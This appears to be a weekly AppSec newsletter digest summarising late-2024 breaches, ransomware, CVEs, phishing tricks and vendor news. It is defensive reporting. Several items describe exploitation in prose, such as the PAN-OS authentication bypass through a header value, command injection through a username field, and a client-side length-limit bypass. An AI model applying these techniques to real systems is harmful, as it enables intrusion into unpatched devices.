- Robert Grupe's AppSecNewsBits
- Posts
- Robert Grupe's AppSecNewsBits & AI 2024-11-23
Robert Grupe's AppSecNewsBits & AI 2024-11-23
EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Fintech Giant Finastra Investigating Data Breach
Finastra, which provides software and services to 45 of the world’s top 50 banks, notified customers of the security incident after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company.
The breach targeted Finastra’s internally hosted Secure File Transfer Platform, or SFTP, which was exploited using stolen credentials—essentially, a username and password. The attacker claims to have leveraged IBM Aspera, a high-speed file transfer tool to exfiltrate data from Finastra’s systems.
In March 2020, Finastra suffered a ransomware attack that sidelined a number of the company’s core businesses for days.
SafePay ransomware gang claims Microlise attack that disrupted prison van tracking
The new SafePay ransomware gang has claimed responsibility for the attack on UK telematics biz Microlise, giving the company less than 24 hours to pay its extortion demands before leaking data.
Major customers reported issues soon after, including delivery giant DHL, which was unable to track its lorries, affecting deliveries to UK convenience stores operated by Nisa Group. British security company Serco, which manages numerous public sector contracts, including with the Ministry of Justice, was also hit. The company reported panic alarms and tracking systems used by prisoner transport vans were temporarily disabled, although service continued without disruption.
Mega US healthcare payments network restores system 9 months after ransomware attack
The only business functions yet to achieve full restoration status are Clinical Exchange (e-health record information exchange), MedRX (pharmacy claims management), and its Payer Print Communication Multi-Channel Distribution System (payment document printing).
However, providers will be feeling the huge financial impact of the incident for much longer. UnitedHealth-owned Optum launched its Temporary Funding Assistance Program on March 1 to support providers as they battled cashflow issues. The total amount of money loaned out to providers on an interest-free basis is thought to be more than $6 billion. That's on top of the $872 million Change Healthcare spent on remediating the attack just at the end of March, costs that have since risen to well above $2 billion (inclusive of tax).
1000s of Palo Alto Networks firewalls hijacked as miscreants exploit critical hole
Rumors started swirling last week about a critical security hole in Palo Alto Networks appliances that allowed remote unauthenticated attackers to execute arbitrary code on devices. Exploitation requires access to the PAN-OS management interface, either across the internet or via an internal network. The manufacturer did eventually admit that the firewall-busting vulnerability existed, and had been exploited as a zero-day - but it was still working on a patch.
Roughly 2,000 devices had been hijacked as of a day after Palo Alto Networks pushed a patch for the holes. The next day the number of seemingly compromised devices had dropped to about 800.
Once the attackers break in, they are using this access to deploy web shells, Sliver implants, and/or crypto miners.
Microsoft 365 Admin portal abused to send sextortion emails
Sextortion emails are scams claiming that your computer or mobile device was hacked to steal images or videos of you performing sexual acts. The scammers then demand from you a payment of $500 to $5,000 to prevent them from sharing the compromising photos with your family and friends. While you would think no one could fall for these scams, they were very profitable when they first appeared in 2018, generating over $50,000 a week.
Over the past week, people on LinkedIn, X, and the Microsoft Answers forum reported receiving sextortion emails through the Microsoft 365 Message Center, allowing the scams to bypass spam filters and land in the inbox.
The sextortion emails came from "o365mc@microsoft[.]com," which may feel like a phishing address but is actually Microsoft's legitimate email address used to send messages and notifications from the Microsoft 365 Message Center.
The threat actors are abusing the Personal Message feature by using it to send the sextortion message. However, this personal message field is limited to only 1,000 characters, with anything additional being truncated by the user interface. As the extortion message sent by the scammers is far more than 1,000 characters, it made me wonder how they were bypassing this restriction. The answer is simple. They just open up the browser's dev tools and change the maximum length field of the <textarea> tag to an arbitrary number of their choice. As Microsoft does not perform server-side checks for the character length, the entire extortion message is now sent along with the advisory.
Security plugin flaw in millions of WordPress sites gives admin access
Really Simple Security is a security plugin for the WordPress platform, offering SSL configuration, login protection, a two-factor authentication layer, and real-time vulnerability detection. Its free version alone is used in over four million websites.
The critical severity flaw in question is CVE-2024-10924, discovered by Wordfence's researcher István Márton on November 6, 2024.
It is caused by improper handling of user authentication in the plugin's two-factor REST API actions, enabling unauthorized access to any user account, including administrators.
Specifically, the problem lies in the 'check_login_and_get_user()' function that verifies user identities by checking the 'user_id' and 'login_nonce' parameters.
When 'login_nonce' is invalid, the request isn't rejected, as it should, but instead invokes 'authenticate_and_redirect(),' which authenticates the user based on the 'user_id' alone, effectively allowing authentication bypass.
The flaw is exploitable when two-factor authentication (2FA) is enabled, and even though it's disabled by default, many administrators will allow it for stronger account security.
Cyberattack at French hospital exposes health data of 750,000 patients
A threat actor using the nickname 'nears' (previously near2tlg) claimed to have attacked multiple healthcare facilities in France, alleging that they have access to the patient records of over 1,500,000 people.
The hacker claims they breached MediBoard by Software Medical Group, a company offering Electronic Patient Record (EPR) solutions across Europe.
"We can confirm that our software is not responsible, but rather, a privileged account within the client's infrastructure was compromised by an individual who exploited the standard functions of the solution,"
Spotify abused to promote pirated software and game cheats
A Spotify playlist with the title "Sony Vegas Pro 13 Crack..." appeared to drive traffic to one or more "free" software sites listed in the playlist title and description.
Cybercriminals exploit Spotify for malware distribution. Why? Spotify has a strong reputation and its pages are easily indexed by search engines, making it an effective platform to promote malicious links. By injecting targeted keywords and links in playlist names and podcast descriptions, threat actors may benefit from boosting SEO for their dubious online properties, since Spotify's web player results appear in search engines like Google.
This is made possible because, in addition to mobile and desktop apps, Spotify offers a web player version at open[.]spotify[.]com. Playlists and podcasts available on the web player are, as with any website, crawled by search engines like Google. This means, the illicit "free" software websites now have greater visibility and a higher chance of driving traffic to their servers—which are often riddled with ads, spam content, bogus "surveys," and crypto giveaways that one would have to navigate through to, perhaps, be able to finally download a cracked software product, which is once again bound to be risky.
Compared to playlists, we observed much greater instances of spurious podcasts, each with several "episodes," published with the apparent intention of promoting spam links, "torrents," and Telegram channels that seem to be scams. These "episodes" are about ten to twenty seconds long, and comprise synthesized speech audio that directs users to visit the "link in the description."
Similarly, some podcasts we discovered claimed to offer game cheat codes for hit titles like Apex Legends, Fortnite hacks, Roblox scripts, "GTA V mods," and trainers.
Palo Alto Networks zero-day firewall flaws caused by basic dev mistakes
Attackers are chaining two flaws in the wild to bypass authentication and escalate privileges via the PAN-OS management web interface to gain root privileges on Palo Alto Networks firewalls.
The first vulnerability (CVE-2024-0012) is rated critical with a score of 9.3 out of 10. By exploiting this issue, attackers can bypass authentication and gain administrative privileges on the management interface, enabling them to execute admin actions and change configurations. While this is bad enough, it does not directly lead to a full system compromise unless this functionality can be leveraged to execute malicious code on the underlying operating system. It turns out that attackers found such a way via a second vulnerability (CVE-2024-9474), which enables anyone with administrative privileges on the web interface to execute code on the Linux-based OS as root — the highest possible privilege.
watchTowr researchers found that a redirect script called uiEnvSetup.php expects the HTTP_X_PAN_AUTHCHECK value to be set to off, and if this is provided in the request, the server will just accept it. “We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!,” the researchers wrote in their report. “At this point, why is anyone surprised?”
The second bug is also trivial, being a command injection flaw that allows shell commands to be passed as a username to a function called AuditLog.write(), which then passes the injected command to pexecute().
'Alarming' security bugs lay low in Linux's needrestart utility for 10 years
Five vulnerabilities were identified this week for the first time, although they were actually introduced in April 2014.
The little tool is available separately and in various Linux distributions, and by default in Ubuntu Server, at least. All versions of the utility before 3.8 are considered vulnerable and attackers could execute code as root. Versions after 3.8 have the fix applied.
This exploit is achieved by manipulating an attacker-controlled environment variable that influences the Python/Ruby interpreter, passing unsanitized data to a library that expects safe input, thereby enabling the execution of arbitrary shell commands.
Qualys Threat Research Unit (TRU) said it was able to develop a working exploit but wouldn't release it, describing the vulnerabilities are "easily exploitable" and urged admins to apply the recommended fixes promptly.
What’s Weak This Week: Latest CISA Vulnerability Alerts
Apple Multiple Products Code Execution, Apple Multiple Products Cross-Site Scripting (XSS), Oracle Agile Product Lifecycle Management (PLM) Incorrect Authorization, VMware vCenter Server Heap-Based Buffer Overflow, VMware vCenter Server Privilege Escalation, Progress Kemp LoadMaster OS Command Injection, Palo Alto Networks PAN-OS Management Interface Authentication Bypass, Palo Alto Networks PAN-OS Management Interface OS Command Injection
HACKING
Chinese ship casts shadow over Baltic subsea cable snipfest
The Danish military has confirmed it is tracking a Chinese ship that is under investigation after two optical fiber internet cables under the Baltic Sea were damaged. The two cables run between Finland and Germany and between Lithuania and Sweden respectively. They are part of the circa 600 undersea cables – or shall we say, 600 that are publicly known about and tracked. Depending on weather conditions, estimated completion of the cable repair is by the end of November.
Fake AI video generators infect Windows, macOS with infostealers
Over the past month, threat actors have created fake websites that impersonate an AI video and image editor called EditPro. As discovered by cybersecurity researcher g0njxa, the sites are promoted through search results and advertisements on X that share deepfake political videos, such as President Biden and Trump enjoying ice cream together.
Clicking the images brings you to fake websites for the EditProAI application, with editproai[.]pro created to push Windows malware and editproai[.]org to push macOS malware.
The sites are professional-looking and even contain the ubiquitous cookie banner, making them look and feel legitimate.
However, clicking the "Get Now" links will download an executable pretending to be the EditProAI application. The Windows malware is signed by what appears to be a stolen code signing certificate from Softwareok[.]com, a freeware utility developer.
If you have downloaded this program in the past, you should consider all of your saved passwords, cryptocurrency wallets, and authentications compromised and immediately reset them with unique passwords at every site you visit.
Inside the Booming 'AI Pimping' Industry
Instagram is flooded with hundreds of AI-generated influencers who are stealing videos from real models and adult content creators, giving them AI-generated faces, and monetizing their bodies with links to dating sites, Patreon, OnlyFans competitors, and various AI apps.
The practice, first reported by 404 Media in April, has since exploded in popularity, showing Instagram is unable or unwilling to stop the flood of AI-generated content on its platform and protect the human creators on Instagram who say they are now competing with AI content in a way that is impacting their ability to make a living.
CISA says BianLian ransomware now focuses only on data theft
BianLian had started a switch to data theft extortion, gradually abandoning file encryption tactics, especially after Avast released a decryptor for the family in January 2023.
CISA recommends strictly limiting the use of RDP, disabling command-line and scripting permissions, and restricting the use of PowerShell on Windows systems.
Don’t Hold Down The Ctrl Key—New Warning As Cyber Attacks Confirmed
Threat actors increasingly turning to the use of Microsoft Visio .vsdx format files to evade detection during credential stealing cyber attacks. Using another URL embedded in that file and behind what the researchers described as a clickable call-to-action, most commonly a “view document” button. To access the embedded URL, victims are instructed to hold down the Ctrl key and click, a subtle yet highly effective action designed to evade email security scanners and automated detection tools. By asking for this human interaction, the attackers hope to bypass automated systems that don’t expect such a behavior in an attack. The victim is now redirected to another fake page, this time one that looks for all intents and purposes to be a Microsoft 365 portal login page which is designed, of course, to steal user credentials.
Phishing emails increasingly use SVG attachments to evade detection
Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code.
SVG attachments can be as they not only allow you to display graphics but can also be used to display HTML, using the <foreignObject> element, and execute JavaScript when the graphic is loaded. This allows threat actors to create SVG attachments that not only display images but also create phishing forms to steal credentials. Arecent SVG attachment displays a fake Excel spreadsheet with a built-in login form, that when submitted, sends the data to the threat actors.
Spies hack Wi-Fi networks in far-off land to launch attack on target next door
For whatever reason—likely an assumption that 2FA on the Wi-Fi network was unnecessary because attacks required close proximity—the target deployed 2FA on the Internet-connecting web services platform but not on the Wi-Fi network. That one oversight ultimately torpedoed a robust security practice.
GruesomeLarch found devices in physically adjacent locations, compromised them, and used them to probe the target’s Wi-Fi network. It turned out credentials for the compromised web services accounts also worked for accounts on the Wi-Fi network, only no 2FA was required. Adding further flourish, the attackers hacked one of the neighboring Wi-Fi-enabled devices by exploiting what in early 2022 was a zero-day vulnerability in the Microsoft Windows Print Spooler.
Cybercriminals turn to pen testers to test ransomware efficiency
Any good developer knows that software needs to be tested before deploying in production environments. This is also true for ransomware gangs.
“In the Q3 2024 Cato CTRL SASE Threat Report, we highlight a trend of ransomware gangs recruiting pen testers. We believe this is to test whether their ransomware works for future attacks.”
Out of the hundreds of AI applications that Cato CTRL monitors, 10 AI applications were tracked and used by organizations (Bodygram, Craiyon, Otter[.]ai, Writesonic, Poe, HIX[.]AI, Fireflies[.]ai, PeekYou, Character[.]AI, and Luma AI), revealing various security risks. The top concern is data privacy. “Shadow AI is a major threat that has emerged in 2024,” said Maor. “Organizations should be mindful of the unauthorized use of AI applications and the dangers of letting employees inadvertently expose sensitive information.”
In Q3 2024, researchers found that 60% of attempts to exploit CVEs were blocked in TLS traffic.
Cato found that only 45% of participating organizations enable TLS inspection. Even then, only 3% of organizations inspected all relevant TLS-encrypted sessions. This leaves the door open for threat actors to utilize TLS traffic and remain undetected.
Cato found that organizations who enabled TLS inspection blocked 52% more malicious traffic than organizations without TLS inspection.
PyPI Attack: ChatGPT, Claude Impersonators Deliver JarkaStealer via Python Libraries
Cybersecurity researchers have discovered two malicious packages uploaded to the Python Package Index (PyPI) repository that impersonated popular artificial intelligence (AI) models like OpenAI ChatGPT and Anthropic Claude to deliver an information stealer called JarkaStealer.
[rG: This underscores the importance of development teams to use a Binary Management System with integrated SCA (Software Composition Analysis) vulnerability scanning.]
APPSEC, DEVSECOPS, DEV
Data is the new uranium – incredibly powerful and amazingly dangerous
Welcome to the latest movement in IT's endless swings and roundabouts. Just as we've seen the center/edge debate in computing shift back and forth repeatedly over the last 50 years, we're now seeing emergence of another debate: data value versus data cost. The mantra at the start of this debate – "data is the new oil" – looks to be replaced by another, more accurate assessment: "data is the new yellowcake." For the unfamiliar, yellowcake is a radioactive, toxic, uranium oxide that can be further refined into a range of both very helpful and apocalyptically terrifying products.
Today, plenty of enterprises manage multiple petabytes of storage and we think nothing about moving a terabyte across the network or generating a few gigabytes of new media during a working day. Data is so common it has become nearly invisible. But they're mostly unable to identify all the data they hold, and are unsure if those who collect it understand the reputational and financial risks of a data breach – blame for which lands on a CISO's desk no matter who messed up. CISOs therefore increasingly feel that the cost of managing data sometimes exceeds its value.
[rG: Security By Default – Ensure that all database fields need to be strongly encrypted with least-privileged IAM usage. Yes, not as quick and easy to create and manage, but provides peaceful sleep knowing that reasonable due diligence protections are in place to mitigate sensitive information compromise and exposures is in place.]
Five backup lessons learned from the UnitedHealth ransomware attack
Some ransomware groups – BlackCat, Akira, Lockbit, Phobos, and Crypto, for example – have been bypassing production systems altogether, and going straight for the backups.
Network segmentation and air-gapped backup
The company admitted that their backups weren’t sequestered with network segmentation or infrastructure gapping, so the attackers were able to lock those up, blocking any recovery path from the initial attack.Multi-factor authentication (MFA)
The attack was orchestrated by hackers who leveraged stolen credentials to infiltrate the company’s systems lacking MFA.Restricting administrative access
Restricting administrative privileges is a vital part of a solid backup security strategy, as these privileges can be a primary target for attackers.Immutable backup
Ensure at least of one of your backup copies is stored on immutable storage. This will ensure your backup data cannot be altered, deleted, or encrypted by malicious actors, including ransomware.Secure configuration baseline
As recently mandated by the EU DORA (Digital Operational Resilience Act) and previously by USA NIST; establishing a secure configuration baseline for your backup and storage environment, and using tools to detect baseline deviations is critical. It will ensure your backup estate is adhering to the principles laid out in this recommendation section – and much more.
Case Studies of Real-World SaaS Ransomware Attacks: 'They Didn't Handle It Well'
Rackspace ransomware attack of 2022: The ransomware attack took place because they were on an unpatched version of Exchange, and attackers were able to get in and authenticate and then ransomware that way. There were no backups. So what happened was the customers were affected. All of their email was now gone." The attack occurred in the holiday season, early December shortly after Thanksgiving.
Common security measures and best practices, include:
Strong Authentication Methods -- Multi-Factor Authentication (MFA), Single Sign-On (SSO)
Regular Data Backups -- Ensuring recovery capabilities if ransomware strikes
Encryption Standards -- Data encryption in transit and at rest
Security Awareness Training -- Educating employees on phishing and cyber hygiene
Building a ransomware defense strategy for SaaS involves:
Proactive Threat Detection -- Identifying suspicious activity early
Regular Vulnerability Assessments -- Scanning and patching SaaS applications
Incident Response Playbooks -- Steps for handling ransomware attacks in SaaS
Communication Plans -- Coordinating with teams and clients during an attack
Phishing: The attack mechanism is that ransomware usually enters the SaaS platform through phishing emails that are going to trick users into clicking malicious links or an attachment -- pretty classic phishing example. Once they get into one device, what the attackers might try to do is spread to connected SaaS applications, encrypting data. What's kind of weird about this is, unlike in an on-premises environment, the ransomware doesn't have to move laterally across network computers in the same way. For example, it might just focus in data residing in SaaS storage, for example, files on Google Drive or OneDrive. It can encrypt these files directly or delete them, sometimes affecting multiple accounts through shared folders, folders or documents.
Advice for organizations to protect themselves against ransomware and phishing attacks in the SaaS space. Building a resilient SaaS security framework
Integrating Security by Design -- Building security into the SaaS adoption process
Continuous Improvement through Audits and Assessments
Fostering a Security-First Culture -- Involving all departments in security awareness
Collaborative Approach with SaaS Vendors -- Coordinated effort with providers for optimal security
Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a US Critical Infrastructure Sector Organization
Lessons Learned:
The assessed organization had insufficient technical controls to prevent and detect malicious activity.
The organization relied too heavily on host-based endpoint detection and response (EDR) solutions and did not implement sufficient network layer protections.The organization’s staff require continuous training, support, and resources to implement secure software configurations and detect malicious activity.
Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure they are provided sufficient resources by management to have the conditions to succeed in protecting their networks.The organization’s leadership minimized the business risk of known attack vectors for the organization.
Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation.
CISA urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this advisory, including those listed below:
Embed security into product architecture throughout the entire software development lifecycle (SDLC).
Eliminate default passwords.
Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.
Stop Using Your Passwords—1Password And Google Warn
Both have warned that passwords are less secure than an already available and easier to use alternative. Now 1Password has exclusively revealed to me how its users are flocking to passkeys as they seek to abandon passwords for a more hacker-resistant and passwordless future. Here’s what you need to know and why making the move is less painful than you might imagine.
Launched initially as an initiative by Apple, Google and Microsoft, passkeys are consumerizing security standards such as FIDO and WebAuthn. You can try a simple passkey demo at Passkeys[.]io and see just how painless they are to use and create. Google’s security team has gone on record to say that “passkeys are faster, more secure, and more convenient than passwords and multi-factor authentication, making them a desirable alternative to passwords and a promising development in the journey to a more secure future.”
The U.S. Cybersecurity And Infrastructure Security Agency has published a new warning as threat actors increasingly turn to multi-factor authentication bypass attacks. “Malicious actors don’t break in—they log in,” CISA warned, adding that many organizations are now struggling to protect their staff from passwords and credential phishing. While accepting that any kind of two-factor or multi-factor authentication is better than none, at all stance that I heartily support, CISA warned that what it calls legacy MFA is “no match for modern threats.” By legacy MFA CISA is referring to the likes of applications that produce authentication codes or text-based, email-based or even push notification-based second factors.
Will passkeys ever replace passwords? Can they?
There remain a few weaknesses. There is no getting away from the fact that public keys always need some sort of bootstrap process. The process is bootstrapped by getting the user to authenticate using a traditional approach (such as username and password) which remains open to traditional attacks.
If a website adopts passkeys without disallowing subsequent login attempts by password, then the system remains roughly as vulnerable to phishing attacks as it was before. It bothers me to read blog posts from seemingly credible sources that don’t address the fact that passkeys are being added in addition to passwords but not (yet) replacing them. Maybe the time will come when passwords are the exception, but I see no way to get there on the current trajectory.
There is a well-defined API to allow a broad choice of authentication devices (such as FIDO keys or password managers) to manage the creation and use of private/public key pairs. But unless things get a lot more consistent and smooth for the end user, I fear this will end up just like PGP or client certificates in TLS: A technically valid solution that has minimal impact on the majority of users.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Out-of-bounds Write
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Cross-Site Request Forgery (CSRF)
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Out-of-bounds Read
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Use After Free
Missing Authorization
Unrestricted Upload of File with Dangerous Type
Improper Control of Generation of Code ('Code Injection')
Improper Input Validation
Improper Neutralization of Special Elements used in a Command ('Command Injection')
Improper Authentication
Improper Privilege Management
Deserialization of Untrusted Data
Exposure of Sensitive Information to an Unauthorized Actor
Incorrect Authorization
Server-Side Request Forgery (SSRF)
Improper Restriction of Operations within the Bounds of a Memory Buffer
NULL Pointer Dereference
Use of Hard-coded Credentials
Integer Overflow or Wraparound
Uncontrolled Resource Consumption
Missing Authentication for Critical Function
OWASP Reveals Updated 2025 Top 10 Risks for LLMs, Announces New LLM Project Sponsorship Program and Inaugural Sponsors
LLM01:2025 Prompt Injection
LLM02:2025 Sensitive Information Disclosure
LLM03:2025 Supply Chain
LLM04: Data and Model Poisoning
LLM05:2025 Improper Output Handling
LLM06:2025 Excessive Agency
LLM07:2025 System Prompt Leakage
LLM08:2025 Vector and Embedding Weaknesses
LLM09:2025 Misinformation
2024 DORA Accelerate State of DevOps report
Explore the ways of working that affect software development and delivery performance across the broad categories of AI, platform engineering, developer experience, and organizational transformation.
Elasticsearch Was Great, But Vector Databases Are the Future
For decades, keyword matching, also known as full-text search, exemplified by Elasticsearch, has been the default choice for information retrieval systems like enterprise search and recommendation engines.
As AI-powered search technologies advance, there is a shift toward semantic search, enabling systems to understand both the meaning and intent behind user queries. Embedding models and vector databases have become central to this shift.
Semantic search surpasses keyword matching by representing data as vector embeddings, providing a more nuanced understanding of search intent and transforming applications ranging from retrieval-augmented generation (RAG) to multimodal search.
In practice, effective information retrieval systems need both semantic understanding and exact keyword matching. For example, users expect search results to show concepts related to their search queries while also respecting the literal text used in the query, such as special terms and names and return the exact matching results.
A semantic search powered by dense vectors helps to understand the meaning (like knowing that “car” and “automobile” are the same) and traditional full-text search provides the precise results users expect (like finding exact matches for “Python 3.9”). As a result, many organizations are adopting a hybrid search approach, combining the strengths of both methods to balance flexible semantic relevance with predictable exact keyword matching.
VENDORS & PLATFORMS
Microsoft Is Introducing a Bunch of New ‘AI Agents’ in Office.
Announcements include:
Copilot Actions in Microsoft 365 Copilot to help you automate everyday repetitive tasks.
New agents in Microsoft 365 to unlock SharePoint knowledge, provide real-time language interpretation in Microsoft Teams meetings, and automate employee self-service.
The Copilot Control System to help IT professionals confidently manage Copilot and agents securely.
Not all of the agents Microsoft discussed today are available yet. One of the AI agents, a real-time Teams translator bot called Interpreter, is slated for next year. Microsoft will be adding available agents to Copilot Studio, currently an extra $200 charge on top of Microsoft 365, as they are ready, with a library for downloading agents currently in public preview. Developers are also able to create their own agents for 365, too, via an SDK that’s also now in public preview.
As for Copilot Actions, these are currently in private preview and will seemingly be available for everyone with a Microsoft 365 Copilot subscription (although Microsoft is mostly talking about them in an enterprise context). They are currently an extra $30 on top of the base Microsoft 365 subscription, assuming you don’t live in one of the areas that just got access to Copilot in 365 for free.
Microsoft’s controversial Recall scraper is finally entering public preview
Over five months after publicly scrapping the first version of the Windows Recall feature for its first wave of Copilot+ PCs, Microsoft announced today that a newly rearchitected version of Recall is finally ready for public consumption.
Recall is one of Microsoft’s many AI-driven Windows features exclusive to Copilot+ PCs, which come with a built-in neural processing unit (NPU) capable of running AI and machine learning workloads locally on your device rather than in the cloud. When enabled, Recall runs in the background constantly, taking screenshots of all your activity and saving both the screenshots and OCR’d text to a searchable database so that users can retrace their steps later.
The new version of Recall can be completely uninstalled for users who have no interest in it, or by IT administrators who don't want to risk it exposing sensitive data.
Testers will need to kick the tires on all of these changes to make sure that they meaningfully address all the risks and issues that the original version of Recall had, and this Windows Insider preview is their chance to do it.
AI hiring bias? Men with Anglo-Saxon names score lower in tech interviews
A lot of AI recruiting startups that said they used language models and were bias-free.
A study looked at Google's Gemini-1.5-flash, Mistral AI's Open-Mistral-nemo-2407, and OpenAI's GPT4o-mini, to see how they classified and rated responses to 24 job interview questions.
The expected finding was that men and Western names would be favored, as prior bias studies have found. Instead, the results told a different story.
The applicant’s name and gender is permuted 200 times, corresponding with 200 discrete personas, subdivided into 100 males and 100 females, and grouped into four different distinct cultural groups (West African, East Asian, Middle Eastern, Anglo-Saxon) reflected by their first name and surname. Crucially, various combinations of names and backgrounds were used for the same answers to test the models.
Thus this isn't the case that men with Anglo-Saxon names just aren't as good as their opposite at software engineering; it's that when the models were presented with that kind of male applicant, the computer systems down-rated otherwise favored answers.
The dirty little secret of open source contributions
“Nobody cares if you contribute.” That’s what a Postgres friend said to me during lunch at KubeCon when I suggested that hiring Postgres contributors could be a selling point for customers. His comment surprised me because for years I’ve believed the open source dogma that contributions somehow qualified developers and vendors to disproportionately profit from projects. This, despite the overwhelming evidence to the contrary.
Though this happens rarely, should a company see a need to fork the project for long-term customer welfare, having core contributors and maintainers positions them to succeed with a fork.
DARPA-backed voting system for soldiers abroad savaged
A proposed system – dubbed CACvote in reference to military smart ID cards called "Common Access Cards" – consists of four elements: voting kiosks at military bases for military personnel; a computer system that receives ballots from those kiosks; a cryptographic protocol for encoding and transmitting ballots, which also get printed and mailed; and a risk-limiting audit (RLA) protocol intended to detect integrity violations (eg, hacking) that alter an election outcome, and to correct the outcome.
The consensus of election security experts is that electronically returned ballots are vulnerable to large-scale remote attacks and manipulation. To illustrate this point, various electronic voting systems have been found to be insecure in Washington, DC, in Estonia, in Australia, and in Switzerland, as well as the Voatz and Democracy Live systems.
According to an analysis paper from Andrew Appel, professor of computer science at Princeton University, and Philip Stark, professor of statistics at UC Berkeley, CACvote contains interesting ideas that are not inherently unsound" but isn't realistic given the legal, institutional, and practical changes necessary to make it work.
MERGE, they observe, makes unrealistic demands on voters to check cryptographic signatures, look up those signatures on a public bulletin board several days after casting a vote, and then check to make sure their printed paper ballot reflects their touchscreen voting voices.
D-Link tells users to trash old VPN routers over bug too dangerous to identify
Vendor offers 20% discount on new model, but not patches
[rG: Check all your home and business networking gear for End of Support dates, and then add calendar reminder to replace.]
LEGAL & REGULATORY
Feds Charge Five Men in ‘Scattered Spider’ Roundup
Federal prosecutors in Los Angeles this week unsealed criminal charges against five men alleged to be members of a hacking group responsible for dozens of cyber intrusions at major U.S. technology companies between 2021 and 2023, including LastPass, MailChimp, Okta, T-Mobile and Twilio.
The targeted SMS scams asked employees to click a link and log in at a website that mimicked their employer’s Okta authentication page. Some SMS phishing messages told employees their VPN credentials were expiring and needed to be changed; other phishing messages advised employees about changes to their upcoming work schedule.
These attacks leveraged newly-registered domains that often included the name of the targeted company, such as twilio-help[.]com and ouryahoo-okta[.]com. The phishing websites were normally kept online for just one or two hours at a time, meaning they were often yanked offline before they could be flagged by anti-phishing and security services.
The phishing kits used for these campaigns featured a hidden Telegram instant message bot that forwarded any submitted credentials in real-time. The bot allowed the attackers to use the phished username, password and one-time code to log in as that employee at the real employer website.
If convicted, each defendant would face a statutory maximum sentence of 20 years in federal prison for conspiracy to commit wire fraud, up to five years in federal prison for the conspiracy count, and a mandatory two-year consecutive prison sentence for aggravated identity theft.
Automatic Braking Systems Save Lives. Now They’ll Need to Work at 62 MPH
One industry group estimates that US automakers' move to install AEB on most cars—something they did voluntarily, in cooperation with road safety advocates—will prevent 42,000 crashes and 20,000 injuries by 2025.
AAA researchers tested three model year 2018 and 2017 vehicles versus three model year 2024 vehicles, and found the AEB systems in the newer cars were twice as likely as the old systems to avoid collisions at speeds up to 35 miles per hour. In fact, the new systems avoided all of the tested collisions at speeds between 12 and 35 mph. The majority of the newer cars avoided hitting a non-moving target at 45 mph, too.
Earlier this year, the US National Highway Traffic Safety Administration, which crafts the country’s road safety rules, announced that by 2029, it will require all cars to be able to stop and avoid contact with any vehicle in front of them at even faster speeds: 62 mph. The Feds will also require automakers to build AEB systems that can detect pedestrians in the daytime and at night. And automakers will have to build tech that applies brakes automatically at speeds up to 45 mph when it senses an imminent collision with a person, and 90 mph when it senses one with a car.
The government estimated that installing more advanced AEB systems on its cars would cost an additional $350 per vehicle. The auto lobbying group estimates prices could range up to $4,200 per car instead, and it has filed a petition to request changes to the final federal rules.
Put your usernames and passwords in your will, advises Japan's government
The Center's somewhat maudlin advice is motivated by recent incidents in which citizens struggled to cancel subscriptions their loved ones signed up for before their demise, because they didn't know their usernames or passwords. The resulting "digital legacy" can be unpleasant to resolve, the agency warns, so suggested four steps to simplify ensure our digital legacies aren't complicated.
Some entrepreneurs have already identified end of life services as an opportunity. "Dead Man's Switch" apps can be set to contact whomever you choose if you do not sign in to certain accounts after a period you select as a likely indicator of your departure from this world. Meta/Facebook also offers the chance to nominate a "legacy contact" who can manage your account.
[rG: Look for “Legacy Account” settings in password/credential management applications.]
And Now For Something Completely Different …
Every Noise At Once: Dangerous time suck for music lovers – explore all music genres on Spotify: click on genre to hear sample, then click on double chevrons for drill down artists, discography, and play on Spotify.
Ian's Shoelace Site – Shoe Lacing Methods: Fancy up your footwear
The end of remote work
It doesn’t matter if you’re a remote work advocate or naysayer. If you’re on either extreme of the spectrum, your news feed will often have blurbs about how a large company is bringing people back to the office. Such news bytes make us feel like everyone’s getting back to the office. But as I’ve explained earlier on this site, the news focuses on a quarter of the industry - i.e. the WITCH and TAMMANA - and ignores everyone else.
Are you “that” company?
In India, IT is a major industry. It employs about five million workers. But if you ask people to name the biggest IT companies, they’ll name five, which for better or worse, go by the acronym WITCH - Wipro, Infosys, TCS, Cognizant and HCL. Between these companies, they employ 1.35 million workers in India - TCS being the largest at 450,000 employees and HCL being the “smallest” at 150,000 employees. All these companies primarily provide IT services.
The other big companies are the usual suspects. These are the big boys of tech; earlier known as FAANG and who I now refer to as TAMMANA - Tesla (for Twitter, now X), Alphabet, Meta, Microsoft, Amazon, Netflix and Apple. Between them, they employ about 36,500 people. Alphabet, Amazon, and Microsoft employ about 10,000 people each and the remaining companies in this list employ smaller numbers of people, with Netflix making a token presence at 500 employees.
We must all realise that these 12 big companies are nothing like the rest of the industry.
Aside from these behemoths, there are 25,000 IT companies in India. Together, those 25000 companies employ about 3.65 million people. A simple average will tell you that the average IT company employs about 145 workers. Netflix - the smallest of the big boys - employs 3.5x that number of people! So the next time you read an RTO story in the press, ask yourself if the story comes from 12 big boys or from 25,000 companies that represent the rest of the industry.